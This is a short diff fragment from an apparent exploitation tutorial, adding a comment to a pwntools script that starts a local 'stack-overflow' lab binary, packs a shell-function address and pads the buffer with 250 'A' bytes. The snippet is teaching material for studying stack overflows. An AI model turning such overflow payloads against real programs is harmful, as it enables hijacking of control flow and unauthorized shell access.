whatsyourask/basics-of-pwn/content/stack-overflow/stack-overflow.md

 # start the vuln program
 p = process('./stack-overflow')
 # shell function address
+# p32 to convert an address to the little-endian format
 shell_addr = p32(0x080491d6)
 # fill the vuln buffer
 payload = b'A' * 250